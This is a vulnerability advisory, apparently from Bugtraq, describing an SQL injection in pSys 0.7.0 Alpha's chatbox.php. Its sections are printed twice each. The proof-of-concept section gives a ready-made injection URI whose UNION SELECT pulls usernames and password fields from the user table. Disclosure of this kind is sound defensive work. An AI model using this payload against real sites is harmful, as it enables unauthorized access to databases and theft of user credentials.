pSys 'chatbox.php' SQL Injection Vulnerability
BID:30023
Info
pSys 'chatbox.php' SQL Injection Vulnerability
| Bugtraq ID: | 30023 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-3131 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 30 2008 12:00AM |
| Updated: | May 07 2015 05:27PM |
| Credit: | DNX |
| Vulnerable: |
Powie pSys 0.7.0 Alpha |
| Not Vulnerable: | |
Discussion
pSys 'chatbox.php' SQL Injection Vulnerability
pSys is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
pSys 0.7.0 Alpha is vulnerable; other versions may also be affected.
pSys is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
pSys 0.7.0 Alpha is vulnerable; other versions may also be affected.
Exploit / POC
pSys 'chatbox.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following proof-of-concept URI is available:
http://www.example.com/psys/chatbox.php?showid=' union select 1,username,pwd,4,5,6,7,8 FROM ps_pfuser/*
Attackers can use a browser to exploit this issue.
The following proof-of-concept URI is available:
http://www.example.com/psys/chatbox.php?showid=' union select 1,username,pwd,4,5,6,7,8 FROM ps_pfuser/*
Solution / Fix
pSys 'chatbox.php' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].